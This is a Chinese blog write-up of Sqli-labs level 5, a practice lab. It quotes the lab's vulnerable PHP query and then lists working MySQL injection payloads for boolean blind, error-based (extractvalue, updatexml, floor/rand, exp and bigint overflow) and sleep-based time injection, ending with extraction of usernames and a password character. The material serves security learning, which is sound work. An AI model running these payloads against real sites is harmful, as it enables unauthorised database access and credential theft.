• 重闯Sqli-labs关卡第二天(5关)


    第五关(双注入GET单引号字符型注入-报错时间注入)

    盲注
    盲注,Blind SQL Injection
    基于布尔SQL盲注
    基于时间的SQL盲注
    基于报错的SQL盲注

    核心代码:(不会返回数据库中的数据)

     1 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
     2 $result=mysql_query($sql);
     3 $row = mysql_fetch_array($result);
     4 if($row)
     5 {
     6 echo '<font size="5" color="#FFFF00">';    
     7 echo 'You are in...........';
     8 echo "<br>";
     9 echo "</font>";
    10 }
    11 else 
    12 {
    13 
    14 echo '<font size="3" color="#FFFF00">';
    15 print_r(mysql_error());
    16 echo "</br></font>";    
    17 echo '<font color= "#0000ff" font size= 3>';    
    18 
    19 }
    20 }
    21 else { echo "Please input the ID as parameter with numeric value";}
     1 1.探测PHP版本号
     2 id=1' and left(version(),1)=5%23
     3 
     4 2.探测数据库长度
     5 id=1' and length(database())=8%23
     6 探测数据库名(采用二分法)
     7 id=1' and left(database(),1)>'a'%23
     8 id=1' and left(database(),1)='s'%23
     9 id=1' and left(database(),2)>'se'%23
    10 id=1' and left(database(),2)='se'%23
    11 id=1' and left(database(),3)>'sec'%23
    12 id=1' and left(database(),3)='sec'%23
    13 ........
    14 id=1' and left(database(),8)='security'%23
    15 
    16 
    17 3.获取表名
    18 substr() ascii()函数进行尝试
    19 id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>82%23
    20 id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101%23
    21 id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109%23
    22 ...
    23 逐步测试得出表名为:email
    24 想获取第二个表替换limit 后面的值即可第二张表就是limit 1,1
    25 id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=113%23
    26 
    27 
    28 4.获取urser中的列
    29 利用regexp获取
    30 通过regexp检测是否有us**列
    31 id=1' and 1=(select 1 from information_schema.columns where table_name='users' and table_name regexp '^us[a-z]' limit 0,1)--+'
    32 通过regexp检测而是否有username开头的列
    33 id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+
    34 
    35 5.获取列中的内容
    36 利用ord()和mid()函数获取users表的内容
    37 IFNULL()用于判断第一个表达式是否为NULL 如果是返回第二个 否则返回第一个
    38 CAST()把一个字段转成另一个字段
    39 id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>68--+
    40 id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+
    41 id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>68--+
    42 id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),2,1))=68--+
    43 最后爆出 Dumb

    第二种方法:报错注入

     1 id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+
     2 
     3 数值类型超出范围进行报错注入
     4 id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+
     5 
     6 利用bigint溢出进行报错注入
     7 id=1' union select (!(select * from (select user())x) - ~0),2,3--+
     8 
     9 xpath函数报错注入
    10 id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
    11 
    12 id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+
    13 
    14 利用数据的重复性
    15 id=1'union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+

    第三种:sleep延迟注入


    sleep注入是另一种形式的盲注,与bool注入不同,sleep注入没有任何报错信息输出,页面返回不管对或者错都是一种状态,
    攻击者无法通过页面返回状态来判断输入的SQL注入测试语句是否正确,只能通过构造sleep注入的SQL测试语句,根据页面的返回时间判断数据库中存储了那些信息
    判断是否是时间延迟型的注入

     1 ' and sleep(5)--+
     2 爆数据库长度
     3 ' and if(length(database())=8,sleep(5),1)--+
     4 爆数据库名
     5 ' and if(ascii(substr(database(),1,1))>5,sleep(5),1)--+
     6 OR
     7 ' and if(left(database(),1)='s',sleep(5),1)--+
     8 爆判断数据库表数量
     9 ' and if((select count(*) from information_schema.tables where table_schema=database())>1,sleep(5),1)--+
    10 爆表名
    11 ' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(5),1)--+
    12 OR
    13 ' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+
    14 ' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='e' --+
    15 判断字段数量
    16 ' and if((select count(*) from information_schema.columns where table_name='users')>1,sleep(5),1)--+
    17 判断字段名
    18 ' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),1)='f'--+
    19 爆字段下的数据
    20 ' and left((select password from users limit 0,1),1)='D' --+

    附:ASCII转换:https://www.qqxiuzi.cn/bianma/ascii.htm
    参考学习:https://www.cnblogs.com/lcamry/articles/5717442.html
    https://www.cnblogs.com/lcamry/p/6122257.html

  • 相关阅读:
    vmware fusion和mac共享目录
    安卓linker源码阅读01
    sublime text 快捷键
    eclipse使用经验汇总
    递归池:
    ubuntu下adb红米
    蛋疼问题汇总you must restart adb and eclipse
    JNI
    ARM寻址
    了解装饰器
  • 原文地址:https://www.cnblogs.com/xhds/p/12173965.html
Copyright © 2020-2023  润新知